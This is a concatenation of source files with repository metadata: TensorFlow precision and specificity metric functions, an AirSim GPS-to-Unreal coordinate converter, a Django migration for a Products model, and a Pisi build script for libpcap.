  `predictions`. Set operations applied to `top_k` and `labels` calculate the
  true positives, which are used to calculate the precision ("P_{i}" term,
  above).

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
      num_labels=1. N >= 1 and num_labels is the number of target classes for
      the associated prediction. Commonly, N=1 and `labels` has shape
      [batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
      should be in range [0, num_classes), where num_classes is the last
      dimension of `predictions`. Values outside this range are ignored.
    predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
      N >= 1. Commonly, N=1 and `predictions` has shape
      [batch size, num_classes]. The final dimension contains the logit values
      for each class. [D1, ... DN] must match `labels`.
    k: Integer, k for @k metric. This will calculate an average precision for
      range `[1,k]`, as documented above.

  Returns:
    `float64` `Tensor` of shape [D1, ... DN], where each value is the average
    precision for that row.

  Raises:
    ValueError: if k is invalid.
  """
  if k < 1:
    raise ValueError('Invalid k=%s.' % k)
  with ops.name_scope(
      None, 'average_precision', (predictions, labels, k)) as scope:
    labels = _maybe_expand_labels(labels, predictions)
    # Calculate top k indices to produce [D1, ... DN, k] tensor.
    _, predictions_idx = nn.top_k(predictions, k)
    predictions_idx = math_ops.to_int64(predictions_idx,
                                        name='predictions_idx')
    # Expand dims to produce [D1, ... DN, k, 1] tensor. This gives us a
    # separate prediction for each k, so we can calculate separate true
    # positive values for each k.
    predictions_idx_per_k = array_ops.expand_dims(
        predictions_idx, -1, name='predictions_idx_per_k')
    # Replicate labels k times to produce [D1, ... DN, k, num_labels] tensor.
    labels_per_k = _expand_and_tile(
        labels, multiple=k, dim=-1, name='labels_per_k')
    # The following tensors are all of shape [D1, ... DN, k], containing
    # values per row, per k value.
    # `relevant_per_k` (int32) - Relevance indicator, 1 if the prediction at
    #     that k value is correct, 0 otherwise. This is the "rel_{i}" term
    #     from the formula above.
    # `tp_per_k` (int32) - True positive counts.
    # `retrieved_per_k` (int32) - Number of predicted values at each k. This
    #     is the precision denominator.
    # `precision_per_k` (float64) - Precision at each k. This is the "P_{i}"
    #     term from the formula above.
    # `relevant_precision_per_k` (float64) - Relevant precisions; i.e.,
    #     precisions at all k for which relevance indicator is true.
    relevant_per_k = _sparse_true_positive_at_k(
        labels_per_k, predictions_idx_per_k, name='relevant_per_k')
    # Running true-positive count over the k axis: cumsum of relevance.
    tp_per_k = math_ops.cumsum(relevant_per_k, axis=-1, name='tp_per_k')
    # Number retrieved at each rank i is simply i; cumsum of ones yields it.
    retrieved_per_k = math_ops.cumsum(
        array_ops.ones_like(relevant_per_k), axis=-1, name='retrieved_per_k')
    precision_per_k = math_ops.div(
        math_ops.to_double(tp_per_k), math_ops.to_double(retrieved_per_k),
        name='precision_per_k')
    relevant_precision_per_k = math_ops.multiply(
        precision_per_k, math_ops.to_double(relevant_per_k),
        name='relevant_precision_per_k')
    # Reduce along k dimension to get the sum, yielding a [D1, ... DN] tensor.
    precision_sum = math_ops.reduce_sum(
        relevant_precision_per_k, reduction_indices=(-1,),
        name='precision_sum')
    # Divide by number of relevant items to get average precision. These are
    # the "num_relevant_items" and "AveP" terms from the formula above.
    num_relevant_items = math_ops.to_double(_num_relevant(labels, k))
    return math_ops.div(precision_sum, num_relevant_items, name=scope)
def sparse_average_precision_at_k(labels,
                                  predictions,
                                  k,
                                  weights=None,
                                  metrics_collections=None,
                                  updates_collections=None,
                                  name=None):
  """Computes average precision@k of predictions with respect to sparse labels.

  `sparse_average_precision_at_k` creates two local variables,
  `average_precision_at_<k>/total` and `average_precision_at_<k>/max`, that
  are used to compute the frequency. This frequency is ultimately returned as
  `average_precision_at_<k>`: an idempotent operation that simply divides
  `average_precision_at_<k>/total` by `average_precision_at_<k>/max`.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `precision_at_<k>`. Internally, a `top_k` operation computes a `Tensor`
  indicating the top `k` `predictions`. Set operations applied to `top_k` and
  `labels` calculate the true positives and false positives weighted by
  `weights`. Then `update_op` increments `true_positive_at_<k>` and
  `false_positive_at_<k>` using these values.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
      num_labels=1. N >= 1 and num_labels is the number of target classes for
      the associated prediction. Commonly, N=1 and `labels` has shape
      [batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
      should be in range [0, num_classes), where num_classes is the last
      dimension of `predictions`. Values outside this range are ignored.
    predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
      N >= 1. Commonly, N=1 and `predictions` has shape
      [batch size, num_classes]. The final dimension contains the logit values
      for each class. [D1, ... DN] must match `labels`.
    k: Integer, k for @k metric. This will calculate an average precision for
      range `[1,k]`, as documented above.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
    metrics_collections: An optional list of collections that values should
      be added to.
    updates_collections: An optional list of collections that updates should
      be added to.
    name: Name of new update operation, and namespace for other dependent ops.

  Returns:
    mean_average_precision: Scalar `float64` `Tensor` with the mean average
      precision values.
    update: `Operation` that increments variables appropriately, and whose
      value matches `metric`.
  """
  with ops.name_scope(
      name, _at_k_name('average_precision', k),
      (predictions, labels, weights)) as scope:
    # Calculate per-example average precision, and apply weights.
    average_precision = _sparse_average_precision_at_k(
        predictions=predictions, labels=labels, k=k)
    if weights is not None:
      weights = _broadcast_weights(
          math_ops.to_double(weights), average_precision)
      average_precision = math_ops.multiply(average_precision, weights)
    # Create accumulation variables and update ops for max average precision
    # and total average precision.
    with ops.name_scope(None, 'max', (average_precision,)) as max_scope:
      # `max` is the max possible precision. Since max for any row is 1.0:
      # - For the unweighted case, this is just the number of rows.
      # - For the weighted case, it's the sum of the weights broadcast across
      #   `average_precision` rows.
      max_var = _local_variable(
          array_ops.zeros([], dtype=dtypes.float64), name=max_scope)
      if weights is None:
        batch_max = math_ops.to_double(
            array_ops.size(average_precision, name='batch_max'))
      else:
        batch_max = math_ops.reduce_sum(weights, name='batch_max')
      max_update = state_ops.assign_add(max_var, batch_max, name='update')
    with ops.name_scope(None, 'total', (average_precision,)) as total_scope:
      total_var = _local_variable(
          array_ops.zeros([], dtype=dtypes.float64), name=total_scope)
      batch_total = math_ops.reduce_sum(average_precision, name='batch_total')
      total_update = state_ops.assign_add(total_var, batch_total,
                                          name='update')
    # Divide total by max to get mean, for both vars and the update ops.
    mean_average_precision = _safe_scalar_div(total_var, max_var, name='mean')
    update = _safe_scalar_div(total_update, max_update, name=scope)
    if metrics_collections:
      ops.add_to_collections(metrics_collections, mean_average_precision)
    if updates_collections:
      ops.add_to_collections(updates_collections, update)
    return mean_average_precision, update
def _sparse_false_positive_at_k(labels,
                                predictions_idx,
                                class_id=None,
                                weights=None):
  """Calculates false positives for precision@k.

  If `class_id` is specified, calculate binary false positives for `class_id`
  only.
  If `class_id` is not specified, calculate metrics for `k` predicted vs
  `n` label classes, where `n` is the 2nd dimension of `labels_sparse`.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. Commonly, N=1 and `labels`
      has shape [batch_size, num_labels]. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      top `k` predicted classes. For rank `n`, the first `n-1` dimensions must
      match `labels`.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).

  Returns:
    A [D1, ... DN] `Tensor` of false positive counts.
  """
  with ops.name_scope(
      None, 'false_positives', (predictions_idx, labels, weights)):
    labels, predictions_idx = _maybe_select_class_id(labels,
                                                     predictions_idx,
                                                     class_id)
    # Predicted classes absent from the labels are false positives
    # (`aminusb=True` takes predictions minus labels).
    fp = sets.set_size(sets.set_difference(
        predictions_idx, labels, aminusb=True))
    fp = math_ops.to_double(fp)
    if weights is not None:
      with ops.control_dependencies((_assert_weights_rank(weights, fp),)):
        weights = math_ops.to_double(weights)
        # Use `multiply` for consistency with the sibling tp/fn helpers;
        # `math_ops.mul` is the deprecated alias and was later removed.
        fp = math_ops.multiply(fp, weights)
    return fp
def _streaming_sparse_false_positive_at_k(labels,
                                          predictions_idx,
                                          k=None,
                                          class_id=None,
                                          weights=None,
                                          name=None):
  """Accumulates weighted false positives for precision@k.

  When `class_id` is given, binary false positives are computed for that class
  alone. Otherwise, metrics cover the `k` predicted classes vs the `n` label
  classes, where `n` is the 2nd dimension of `labels`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels], where N >= 1 and num_labels is the number of
      target classes for the associated prediction. Commonly, N=1 and `labels`
      has shape [batch_size, num_labels]. [D1, ... DN] must match
      `predictions_idx`.
    predictions_idx: 1-D or higher `int64` `Tensor` with last dimension `k`,
      holding the top `k` predicted classes. For rank `n`, the first `n-1`
      dimensions must match `labels`.
    k: Integer, k for @k metric. Used only for the default op name.
    class_id: Class for which we want binary metrics.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
    name: Name of new variable, and namespace for other dependent ops.

  Returns:
    A tuple of `Variable` and update `Operation`.

  Raises:
    ValueError: If `weights` is not `None` and has an incompatible shape.
  """
  with ops.name_scope(
      name, _at_k_name('false_positive', k, class_id=class_id),
      (predictions_idx, labels, weights)) as scope:
    # Per-row false-positive counts for this batch.
    batch_fp = _sparse_false_positive_at_k(
        labels=labels, predictions_idx=predictions_idx, class_id=class_id,
        weights=weights)
    batch_fp_sum = math_ops.to_double(math_ops.reduce_sum(batch_fp))
    # Scalar accumulator persisting across batches.
    accumulator = _local_variable(
        array_ops.zeros([], dtype=dtypes.float64), name=scope)
    return accumulator, state_ops.assign_add(
        accumulator, batch_fp_sum, name='update')
def sparse_precision_at_k(labels,
                          predictions,
                          k,
                          class_id=None,
                          weights=None,
                          metrics_collections=None,
                          updates_collections=None,
                          name=None):
  """Computes precision@k of the predictions with respect to sparse labels.

  If `class_id` is specified, we calculate precision by considering only the
  entries in the batch for which `class_id` is in the top-k highest
  `predictions`, and computing the fraction of them for which `class_id` is
  indeed a correct label.
  If `class_id` is not specified, we'll calculate precision as how often on
  average a class among the top-k classes with the highest predicted values
  of a batch entry is correct and can be found in the label for that entry.

  `sparse_precision_at_k` creates two local variables,
  `true_positive_at_<k>` and `false_positive_at_<k>`, that are used to compute
  the precision@k frequency. This frequency is ultimately returned as
  `precision_at_<k>`: an idempotent operation that simply divides
  `true_positive_at_<k>` by total (`true_positive_at_<k>` +
  `false_positive_at_<k>`).

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `precision_at_<k>`. Internally, a `top_k` operation computes a `Tensor`
  indicating the top `k` `predictions`. Set operations applied to `top_k` and
  `labels` calculate the true positives and false positives weighted by
  `weights`. Then `update_op` increments `true_positive_at_<k>` and
  `false_positive_at_<k>` using these values.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: `int64` `Tensor` or `SparseTensor` with shape
      [D1, ... DN, num_labels] or [D1, ... DN], where the latter implies
      num_labels=1. N >= 1 and num_labels is the number of target classes for
      the associated prediction. Commonly, N=1 and `labels` has shape
      [batch_size, num_labels]. [D1, ... DN] must match `predictions`. Values
      should be in range [0, num_classes), where num_classes is the last
      dimension of `predictions`. Values outside this range are ignored.
    predictions: Float `Tensor` with shape [D1, ... DN, num_classes] where
      N >= 1. Commonly, N=1 and predictions has shape [batch size, num_classes].
      The final dimension contains the logit values for each class. [D1, ... DN]
      must match `labels`.
    k: Integer, k for @k metric.
    class_id: Integer class ID for which we want binary metrics. This should be
      in range [0, num_classes], where num_classes is the last dimension of
      `predictions`. If `class_id` is outside this range, the method returns
      NAN.
    weights: `Tensor` whose rank is either 0, or n-1, where n is the rank of
      `labels`. If the latter, it must be broadcastable to `labels` (i.e., all
      dimensions must be either `1`, or the same as the corresponding `labels`
      dimension).
    metrics_collections: An optional list of collections that values should
      be added to.
    updates_collections: An optional list of collections that updates should
      be added to.
    name: Name of new update operation, and namespace for other dependent ops.

  Returns:
    precision: Scalar `float64` `Tensor` with the value of `true_positives`
      divided by the sum of `true_positives` and `false_positives`.
    update_op: `Operation` that increments `true_positives` and
      `false_positives` variables appropriately, and whose value matches
      `precision`.

  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match
      `predictions`, or if either `metrics_collections` or `updates_collections`
      are not a list or tuple.
  """
  with ops.name_scope(name, _at_k_name('precision', k, class_id=class_id),
                      (predictions, labels, weights)) as scope:
    # Allow [D1, ... DN]-shaped labels by expanding to [D1, ... DN, 1].
    labels = _maybe_expand_labels(labels, predictions)

    # Indices of the k highest-scoring classes, cast to int64 so the
    # downstream sparse set operations can compare them against `labels`.
    _, top_k_idx = nn.top_k(predictions, k)
    top_k_idx = math_ops.to_int64(top_k_idx)
    tp, tp_update = _streaming_sparse_true_positive_at_k(
        predictions_idx=top_k_idx, labels=labels, k=k, class_id=class_id,
        weights=weights)
    fp, fp_update = _streaming_sparse_false_positive_at_k(
        predictions_idx=top_k_idx, labels=labels, k=k, class_id=class_id,
        weights=weights)

    # `tp_update`/`fp_update` evaluate to the post-increment totals, so
    # `update` both advances the accumulators and yields the new precision.
    metric = math_ops.div(tp, math_ops.add(tp, fp), name=scope)
    update = math_ops.div(
        tp_update, math_ops.add(tp_update, fp_update), name='update')
    if metrics_collections:
      ops.add_to_collections(metrics_collections, metric)
    if updates_collections:
      ops.add_to_collections(updates_collections, update)
    return metric, update
def specificity_at_sensitivity(
    labels, predictions, sensitivity, weights=None, num_thresholds=200,
    metrics_collections=None, updates_collections=None, name=None):
  """Computes the specificity at a given sensitivity.

  The `specificity_at_sensitivity` function creates four local
  variables, `true_positives`, `true_negatives`, `false_positives` and
  `false_negatives` that are used to compute the specificity at the given
  sensitivity value. The threshold for the given sensitivity value is computed
  and used to evaluate the corresponding specificity.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the
  `specificity`. `update_op` increments the `true_positives`, `true_negatives`,
  `false_positives` and `false_negatives` counts with the weight of each case
  found in the `predictions` and `labels`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  For additional information about specificity and sensitivity, see the
  following: https://en.wikipedia.org/wiki/Sensitivity_and_specificity

  Args:
    labels: A `bool` `Tensor` whose shape matches `predictions`.
    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    sensitivity: A scalar value in range `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    num_thresholds: The number of thresholds to use for matching the given
      sensitivity.
    metrics_collections: An optional list of collections that `specificity`
      should be added to.
    updates_collections: An optional list of collections that `update_op` should
      be added to.
    name: An optional variable_scope name.

  Returns:
    specificity: A scalar `Tensor` representing the specificity at the given
      `specificity` value.
    update_op: An operation that increments the `true_positives`,
      `true_negatives`, `false_positives` and `false_negatives` variables
      appropriately and whose value matches `specificity`.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      `sensitivity` is not between 0 and 1, or if either `metrics_collections`
      or `updates_collections` are not a list or tuple.
  """
  if sensitivity < 0 or sensitivity > 1:
    raise ValueError('`sensitivity` must be in the range [0, 1].')

  with variable_scope.variable_scope(name, 'specificity_at_sensitivity',
                                     (predictions, labels, weights)):
    kepsilon = 1e-7  # to account for floating point imprecisions
    # Evenly spaced interior thresholds; the first endpoint is nudged just
    # below 0 so predictions of exactly 0.0 fall on a definite side.
    # NOTE(review): the upper endpoint is `1.0 - kepsilon`, while the lower
    # is `0.0 - kepsilon` — asymmetric; confirm this is intentional.
    thresholds = [(i + 1) * 1.0 / (num_thresholds - 1)
                  for i in range(num_thresholds-2)]
    thresholds = [0.0 - kepsilon] + thresholds + [1.0 - kepsilon]

    values, update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights)
    # Each is a 1-D tensor with one confusion-matrix count per threshold.
    tp = values['tp']
    fn = values['fn']
    tn = values['tn']
    fp = values['fp']

    def compute_specificity_at_sensitivity(name):
      """Computes the specificity at the given sensitivity.

      Args:
        name: The name of the operation.

      Returns:
        The specificity using the aggregated values.
      """
      sensitivities = math_ops.div(tp, tp + fn + kepsilon)

      # We'll need to use this trick until tf.argmax allows us to specify
      # whether we should use the first or last index in case of ties.
      # cumsum over the 0/1 "is closest" indicator is nondecreasing and
      # reaches its maximum at the LAST tied index; argmax then returns the
      # first position attaining that maximum, i.e. the last tied threshold.
      min_val = math_ops.reduce_min(math_ops.abs(sensitivities - sensitivity))
      indices_at_minval = math_ops.equal(
          math_ops.abs(sensitivities - sensitivity), min_val)
      indices_at_minval = math_ops.to_int64(indices_at_minval)
      indices_at_minval = math_ops.cumsum(indices_at_minval)
      tf_index = math_ops.argmax(indices_at_minval, 0)
      tf_index = math_ops.cast(tf_index, dtypes.int32)

      # Now, we have the implicit threshold, so compute the specificity:
      return math_ops.div(tn[tf_index],
                          tn[tf_index] + fp[tf_index] + kepsilon,
                          name)

    specificity = compute_specificity_at_sensitivity('value')
    # Recompute under control deps so `update_op`'s value reflects the
    # freshly incremented confusion-matrix counts.
    with ops.control_dependencies(update_ops.values()):
      update_op = compute_specificity_at_sensitivity('update_op')

    if metrics_collections:
      ops.add_to_collections(metrics_collections, specificity)

    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)

    return specificity, update_op
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
27edb3c2d5067d1fa5b50a92d11a5ec4f2897708 | 7eda6c45c967d3e256ac04b2acd3da401c181aa4 | /PythonCode/Routing/AirSimPythonClient/GPS/GPSToUnreal.py | a8b358368c162561074d8c9c752a5bcc1eb0c666 | [
"MIT"
] | permissive | CryptArc/CBRNeVirtualEnvironment | 419d11fe1672c4302b38fe57f735b924aaa2e6e8 | b3128a5a084b7eca3ff403812646e6db615b93ce | refs/heads/master | 2020-03-31T11:08:45.313174 | 2018-10-03T12:36:51 | 2018-10-03T12:36:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,103 | py | import sys
sys.path.append('..')
from .GPSCoordinate import GPSCoordinate
class GPSToUnreal:
    """Maps WGS84 GPS coordinates to the local Unreal Engine / AirSim
    NED (north-east-down) frame.

    AirSim reports GPS positions relative to a fixed origin near the
    Microsoft campus (``ORIGIN_GPS``); this class re-bases those positions
    onto a user-supplied home coordinate (defaulting to a point near
    Galway, Ireland).
    """

    # AirSim's built-in GPS origin (lat, long, alt-metres) near Microsoft HQ.
    ORIGIN_GPS = GPSCoordinate(47.641468, -122.140165, 122)

    def __init__(self, home_position_GPS: GPSCoordinate = GPSCoordinate(53.2793, -9.0638)):
        '''Set the home GPS coordinate of the RAV (robotic aerial vehicle).'''
        # NOTE: the default GPSCoordinate is constructed once at class
        # definition time and shared between instances; it is never mutated
        # here, so that sharing is harmless.
        self.home_position_GPS = home_position_GPS

    def getMoveToPosXYZFromGPSCoord(self, desired_GPS_position):
        '''Return the Unreal Engine NED (x, y, z) offset, in metres from the
        home position, needed to reach ``desired_GPS_position``.'''
        metres_lat = self.home_position_GPS.get_lat_metres_to_other(desired_GPS_position)
        metres_long = self.home_position_GPS.get_long_metres_to_other(desired_GPS_position)
        metres_alt = self.home_position_GPS.get_alt_metres_to_other(desired_GPS_position)
        # The *_metres_to_other helpers return absolute distances, so restore
        # the sign from the direction of travel.
        if desired_GPS_position.lat < self.home_position_GPS.lat:
            metres_lat = -metres_lat
        if desired_GPS_position.long < self.home_position_GPS.long:
            metres_long = -metres_long
        # NED convention: z points down, so altitude is always emitted negative.
        return (metres_lat, metres_long, -abs(metres_alt))

    def get_GPS_Pos(self, microsoft_relative_GPS_pos: GPSCoordinate):
        '''AirSim calculates GPS position in relation to Microsoft
        headquarters; this gives the equivalent GPS position relative to the
        home coordinate set by the constructor.'''
        if not isinstance(microsoft_relative_GPS_pos, GPSCoordinate):
            # TypeError is the conventional error for a wrong argument type;
            # existing `except Exception` callers still catch it.
            raise TypeError("Please provide a valid WGS84 GPS coordinate")
        # Bearing and geodesic distance from the Microsoft origin to the
        # reported position; replaying that displacement from the home
        # coordinate yields the re-based position.  (Small-angle assumption:
        # the initial bearing is treated as constant along the path.)
        bearing = GPSToUnreal.ORIGIN_GPS.get_initial_bearing(microsoft_relative_GPS_pos)
        distance = microsoft_relative_GPS_pos.get_metres_to_other(GPSToUnreal.ORIGIN_GPS)
        destination = GPSCoordinate._vincentyGeodesicDirect(self.home_position_GPS, distance, bearing)
        return destination
| [
"d.smyth10@nuigalway.ie"
] | d.smyth10@nuigalway.ie |
39ebc904fd401f81c877b99f75fc240b8ad3a65b | db41f8d1726637c4af165b409526eb9a804ec6bb | /proj1/sales/migrations/0001_initial.py | e07ee0a1ad737a0829e1c4023d6e0286603b0857 | [] | no_license | sumitpareek1992/batch50 | cfb288bcaf5d500c23a3683589fd6b790e56b746 | 57a24f9080f9dc9c91af93ff4be5cb1436361352 | refs/heads/master | 2022-12-10T06:45:58.170206 | 2019-01-09T09:37:38 | 2019-01-09T09:37:38 | 149,378,018 | 0 | 0 | null | 2022-12-08T00:47:03 | 2018-09-19T02:05:02 | Jupyter Notebook | UTF-8 | Python | false | false | 605 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-11-10 02:45
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Products',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=250)),
('costprice', models.IntegerField()),
],
),
]
| [
"sumit.pareek1992@gmail.com"
] | sumit.pareek1992@gmail.com |
06c1ae158672d9a651a94f2a70faf79cce3232d5 | fff54b01b46cef0bbc70a6469c88c01c82af5a57 | /network/analyzer/libpcap/actions.py | 33f3310aad9a49bdb10846b36e483c86e64304b9 | [] | no_license | LimeLinux/Packages | e51deae6c0d1406e31f06caa5aaa7749466bef0b | d492e075d8b051df68b98c315ad0628e33a8fac4 | refs/heads/master | 2021-01-11T12:37:22.150638 | 2018-08-30T18:24:32 | 2018-08-30T18:24:32 | 77,054,292 | 5 | 19 | null | 2018-02-02T17:24:06 | 2016-12-21T13:33:45 | Python | UTF-8 | Python | false | false | 853 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/licenses/gpl.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
    # Build position-independent code so the shared library links correctly.
    shelltools.export("CFLAGS", "%s -fPIC" % get.CFLAGS())
    # Regenerate the autotools build system shipped with the tarball.
    autotools.autoreconf("-vfi")
    # configure() splits the argument on whitespace, so the embedded
    # line continuation inside the string is harmless.
    autotools.configure("--prefix=/usr \
                         --enable-ipv6")
def build():
    # Default targets first, then the shared-library variants of libpcap.
    autotools.make("all")
    autotools.make("shared")
def install():
    # Stage the install into the package image directory.
    autotools.rawInstall('DESTDIR="%s"' % get.installDIR())
    # No static libs
    pisitools.remove("/usr/lib/*.a")
    # pcap-int.h is an internal header, but downstream consumers (ppd etc.)
    # need it installed.
    pisitools.insinto("/usr/include", "pcap-int.h")
    pisitools.dodoc("CHANGES", "CREDITS", "README*", "VERSION", "TODO")
| [
"zirkovandersen@gmail.com"
] | zirkovandersen@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.